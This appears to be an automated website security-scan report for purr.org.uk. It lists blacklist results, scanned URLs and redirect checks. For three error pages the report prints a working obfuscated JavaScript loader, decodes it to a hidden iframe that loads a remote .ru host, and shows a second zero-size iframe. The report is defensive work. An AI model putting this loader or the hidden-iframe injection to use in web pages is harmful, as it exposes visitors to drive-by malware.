Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=purr.org.uk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://purr.org.uk/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://purr.org.uk/ | 200 OK Content-Length: 26325 Content-Type: text/html | clean |
http://www.google.com/coop/cse/brand?form=searchbox_011551233539452829591%3Aj4didtow8w4 | 200 OK Content-Length: 2561 Content-Type: text/javascript | clean |
http://s7.addthis.com/js/152/addthis_widget.js | 200 OK Content-Length: 11637 Content-Type: text/javascript | clean |
http://purr.org.uk/index.html | 200 OK Content-Length: 26325 Content-Type: text/html | clean |
http://purr.org.uk/events.html | 200 OK Content-Length: 13599 Content-Type: text/html | clean |
http://purr.org.uk/label.html | 200 OK Content-Length: 77900 Content-Type: text/html | clean |
http://purr.org.uk/audiovisual.html | 200 OK Content-Length: 15924 Content-Type: text/html | clean |
http://purr.org.uk/archives.html | 200 OK Content-Length: 35748 Content-Type: text/html | clean |
http://purr.org.uk/dj_lists.html | 200 OK Content-Length: 12820 Content-Type: text/html | clean |
http://purr.org.uk/directions.html | 200 OK Content-Length: 11460 Content-Type: text/html | clean |
http://purr.org.uk/press/moles_map_lge.pdf | 404 Not Found Content-Length: 1705 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4:1liudph1ux2Brv@|hv%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h); Decoded script: <div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://user17.iframe.ru/?os=yes" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div> Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.crazy-toolbar.com/home/volume/ <iframe src=http://www.crazy-toolbar.com/home/volume/ width=0 border=0 height=0> | ||
http://purr.org.uk/test404page.js | 404 Not Found Content-Length: 1705 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4:1liudph1ux2Brv@|hv%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h); Decoded script: <div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://user17.iframe.ru/?os=yes" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div> Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.crazy-toolbar.com/home/volume/ <iframe src=http://www.crazy-toolbar.com/home/volume/ width=0 border=0 height=0> | ||
http://purr.org.uk/<h2><a name="Tunes">Tunes</a></h2> | 404 Not Found Content-Length: 1705 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4:1liudph1ux2Brv@|hv%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h); Decoded script: <div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://user17.iframe.ru/?os=yes" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div> Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.crazy-toolbar.com/home/volume/ <iframe src=http://www.crazy-toolbar.com/home/volume/ width=0 border=0 height=0> | ||
http://purr.org.uk/press/piney_press_release.pdf | 200 OK Content-Length: 300721 Content-Type: application/pdf | clean |
http://purr.org.uk/press/pineygir_promo_pic.jpg | 200 OK Content-Length: 302878 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: purr.org.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 08:35:53 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 26325
Content-Type: text/html
Last-Modified: Wed, 02 Feb 2011 06:06:38 GMT
...26325 bytes of data.
GET / HTTP/1.1
Host: purr.org.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 08:35:53 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 26325
Content-Type: text/html
Last-Modified: Wed, 02 Feb 2011 06:06:38 GMT
...26325 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: purr.org.uk
Referer: http://www.google.com/search?q=purr.org.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: purr.org.uk
Referer: http://www.google.com/search?q=purr.org.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.